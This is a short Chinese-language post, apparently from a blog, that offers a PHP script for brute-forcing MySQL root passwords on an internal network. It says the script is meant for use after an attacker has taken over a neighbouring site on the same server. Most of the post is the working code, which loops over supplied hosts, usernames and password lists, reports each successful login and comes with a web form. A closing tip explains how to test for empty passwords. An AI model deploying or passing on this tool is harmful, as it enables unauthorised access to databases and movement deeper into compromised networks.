爆破内网mysql数据库root密码的PHP脚本

一般Mysql数据库都不对外连,拿下旁站之后可以用这个脚本来爆破~


代码:

<?php
set_time_limit(0);
$host=explode("\n",@$_POST['host']);
$name=explode("\n",@$_POST['name']);
$password=explode("\n",@$_POST['password']);
if(isset($_POST['submit'])){
foreach ($host as $hostt) {
foreach ($name as $namee) {
foreach ($password as $passwordd) {
@$sql=@mysql_connect($hostt,$namee,$passwordd);
if (@$sql) {
echo $hostt.'+'.$namee.'+'.$passwordd.'<font color="#ff0000">成功</font><br>';
@mysql_close($sql);}
else {
echo $hostt.'+'.$namee.'+'.$passwordd.'失败<br>';//若数据量过大删除此行
@mysql_close(@$sql);}
}}}}
?>
<form action="" method="post">
<span style="position:absolute;">
<textarea name="host" rows="3" cols="30">127.0.0.1</textarea>
<textarea name="name" rows="5" cols="30">root</textarea>
<textarea name="password" rows="10" cols="30">root</textarea>
<input type="submit" name="submit" value="查询" /></span>
</form>



在密码栏目最后一行按个回车即可验证空密码,



评论回复